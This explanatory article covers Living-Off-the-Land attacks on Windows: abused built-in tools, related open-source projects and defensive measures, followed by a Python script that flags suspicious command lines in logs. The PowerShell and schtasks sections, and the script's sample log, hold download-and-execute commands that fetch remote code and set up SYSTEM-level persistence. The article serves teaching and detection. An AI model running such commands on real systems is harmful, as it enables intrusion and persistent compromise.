Living-Off-the-Land (LOTL) Attack

LOTL Attack

In a LOTL attack, the attacker uses features and tools already present on the target system to carry on the attack without being detected. This kind of attack does not rely on malicious code or software that conventional security measures can easily identify. Instead, attackers take advantage of administrative tools, batch files, and built-in system functions to take over the system and steal confidential data.

Living off the Land tactics, techniques, and procedures (TTPs) have become quite popular in the last few years, even though the term was first used in 2013. This is due in part to the typical defensive security approach's inability to recognize new attacks: it relies on blacklisting file hashes, domains, and other indicators of threats seen in earlier attacks.

A few examples of LOTL attacks are the malicious use of PowerShell or Windows Management Instrumentation (WMI), the creation of malicious scripts in built-in scripting languages such as Python or Ruby, and the execution of malicious code through scheduled tasks and registry entries. These are covered in more detail in the section that follows.

Advantages of LOTL Attack

  • Finding anomalies can be challenging, even when log files are generated.
  • Alarms are rarely raised when ordinary cloud services and system tools are used for data exfiltration.
  • The living off the land strategy makes it hard to attribute an attack even when one is found, because many groups employ comparable methods and resources.

Common Tools used in LOTL

CMD.exe:

CMD.exe is a command-line interface available on all Windows operating systems, and it offers attackers a basic terminal. Even though it lacks many of the features and capabilities of PowerShell and of its successors CScript and WScript (such as the ability to run Visual Basic Scripts), it is still frequently used to run unsafe applications or gather basic information. CMD.exe can also execute batch scripts, giving attackers further automation capabilities.

WScript.exe/CScript.exe:

The Windows-based (WScript.exe) and console-based (CScript.exe) script hosts are similar in function to CMD.exe, but they allow more attacker automation than their predecessor because they execute Visual Basic Scripts.

PowerShell:

PowerShell is a tried-and-true administrative tool that is often used in attacks targeting remote systems. It is a powerful scripting language that was introduced in 2006; later versions have greatly expanded its capabilities, including cross-platform support. Attackers can accomplish nearly anything with PowerShell, and they frequently obfuscate their scripts in a number of ways, Base64 encoding being one of the most widely used.

Example:

powershell.exe -nop -ep Bypass -noexit -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; iex ((New-Object System.Net.WebClient).DownloadString('[REMOVED]'))

This command downloads an encrypted DLL into memory and runs it with the PowerShell reflective DLL loader code.

schtasks.exe/at.exe:

Administrators use Task Scheduler and the Scheduled Service Command Line Interface to plan the execution of applications, updates, and backups; attackers can use the same tools to keep their malware persistent or to delay its detonation.

Example:

schtasks /create /tn Trojan /tr "powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''[REMOVED]''))'" /sc ONLOGON /ru System

This scheduled task executes the command at a specific trigger moment (here, at logon, as SYSTEM) on a local or remote system.

MSHTA.exe:

The Microsoft HTML Application host is a standalone executable that can launch JavaScript, VBScript, and HTML Applications (.hta). Because it operates without a web browser, whatever mshta.exe executes is not subject to any browser security controls.

Reg.exe:

The Windows registry is made up of several hives, which are essentially databases in which Windows keeps track of events, configuration settings, and other miscellaneous information. Attackers frequently use it to store malware settings, keep track of targets, store executables in subkeys, and much more.

Wmic.exe:

WMI has a command-line interface, the Windows Management Instrumentation Command-line (WMIC). Administrators find it helpful for examining or modifying system settings on local or remote systems, and it can also run scripts and executables. For the same reasons, attackers find it appealing and can use it to get around security measures such as application allow-listing.

Remote Admin tools:

LogMeIn, GoToMyPC, TeamViewer, VNC, Kaseya, ConnectWise, AnyDesk, and similar programs are frequently deployed so that administrators can remotely access a variety of systems. Attackers can misuse these same tools to gain access to a system.

Open-source Projects

Three open-source initiatives focus on providing guidance for preventing LOTL attacks.

LOLBAS:

Living Off The Land Binaries and Scripts (LOLBAS) is a project that compiles a list of Windows executables that can be used to bypass security controls, execute code, and more. It’s a resource for understanding how these binaries can be potentially exploited in a system.

GTFOBins:

GTFOBins is a similar project that focuses on Unix platforms. It curates Unix binaries that can be used to circumvent local security restrictions, revealing how these binaries might be abused on compromised systems.

LOLDrivers:

LOLDrivers is a project that collects legitimate Windows drivers that can be used by attackers to circumvent security safeguards. It lists these drivers, their capabilities, and potential hazards to help with threat understanding and mitigation.

Detection & Prevention

  • Multi-Factor Authentication (MFA): Even if an attacker manages to obtain a user's password, MFA's extra layer of security makes it harder for them to access the system.
  • Principle of least privilege: Organizations can reduce the potential impact of an attacker by limiting user privileges.
  • Implement network segmentation: Organizations can restrict an attacker's ability to propagate by segmenting their networks into separate parts.
  • Employee training: Employees who receive cybersecurity awareness and safe-practice training may be better able to spot odd system behavior, unexpected warnings or messages, or system modifications.
  • Leverage threat intelligence: Threat intelligence keeps defenders current on emerging attack methods, indicators of compromise (IoCs), and other pertinent information such as supply chain intelligence.
  • Monitor user behavior: UEBA and other behavioral technologies monitor specific user activities, such as extended usage of a given system, the time of day a command is issued, and other deviations from typical behavior.
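As an added example (not part of the original article), the following Python triage script shows what behavioral monitoring of process-creation logs can look like for the tools discussed above: it scores command lines against the PowerShell, schtasks, and mshta patterns in the two commands quoted in the tools section, and decodes a Base64 -EncodedCommand payload before rescoring it, since that is the obfuscation the text names. The rule names, weights, the 'host|user|command_line' log format, and the host and user names in the sample log are assumptions made here; the malicious command lines are the two from the text, with the URL kept as [REMOVED].

```python
import base64
import re

# Weighted rules over a lower-cased command line; names and weights are this example's own choices.
RULES = [
    ("ps_execution_policy_bypass", r"powershell.*-(?:ep|exec(?:utionpolicy)?)\s+bypass", 2),
    ("ps_hidden_window", r"-w(?:indowstyle)?\s+hidden", 2),
    ("ps_download_cradle", r"(?:iex|invoke-expression).*downloadstring", 4),
    ("ps_cert_validation_disabled", r"servercertificatevalidationcallback", 3),
    ("schtasks_runs_script_host", r"schtasks.*/create.*/tr\s+[\"']?(?:powershell|cmd|wscript|cscript|mshta)", 3),
    ("schtasks_runs_as_system", r"schtasks.*/ru\s+system\b", 1),
    ("mshta_remote_or_inline", r"mshta(?:\.exe)?\s+(?:https?:|vbscript:|javascript:)", 4),
]
# Base64 argument of -e / -enc / -EncodedCommand; matched on the original case, since Base64 is case-sensitive.
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def decode_encoded_command(cmd):
    """Return the UTF-16LE text behind an encoded-command argument, or None if absent or invalid."""
    m = ENCODED_ARG.search(cmd)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def score_command_line(cmd):
    """Return (score, rule hits). Base64 hides the payload from the plain rules, so it is decoded and rescored."""
    lowered, score, hits = cmd.lower(), 0, []
    for name, pattern, weight in RULES:
        if re.search(pattern, lowered):
            score, hits = score + weight, hits + [name]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        inner_score, inner_hits = score_command_line(decoded)
        score, hits = score + 3 + inner_score, hits + ["ps_encoded_command"] + inner_hits
    return score, hits

def triage(log_lines, threshold=4):
    """Return (host, user, score, hits) for 'host|user|command_line' records scoring at or above threshold."""
    scored = [(h, u, *score_command_line(c)) for h, u, c in (line.split("|", 2) for line in log_lines)]
    return [r for r in scored if r[2] >= threshold]

# Constructed sample log: the two command lines quoted in the text (URL kept as [REMOVED]), two benign administrative uses, and a Base64-encoded variant of the download cradle built here.
_B64 = base64.b64encode("IEX ((New-Object Net.WebClient).DownloadString('[REMOVED]'))".encode("utf-16-le")).decode()
SAMPLE_LOG = [
    "WS-042|CORP\\jdoe|powershell.exe -nop -ep Bypass -noexit -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; iex ((New-Object System.Net.WebClient).DownloadString('[REMOVED]'))",
    "WS-042|CORP\\jdoe|schtasks /create /tn Trojan /tr \"powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''[REMOVED]''))'\" /sc ONLOGON /ru System",
    "SRV-07|CORP\\svc_backup|powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\\Scripts\\backup.ps1",
    "SRV-07|CORP\\admin|schtasks /create /tn NightlyBackup /tr \"C:\\Program Files\\Backup\\backup.exe\" /sc DAILY /st 02:00",
    f"WS-013|CORP\\mlee|powershell.exe -w hidden -EncodedCommand {_B64}",
]
```

Running triage(SAMPLE_LOG) flags the three attacker-style records and leaves the signed backup script and the ordinary backup task below threshold, which is the point of scoring combinations of flags rather than alerting on any single use of an administrative tool.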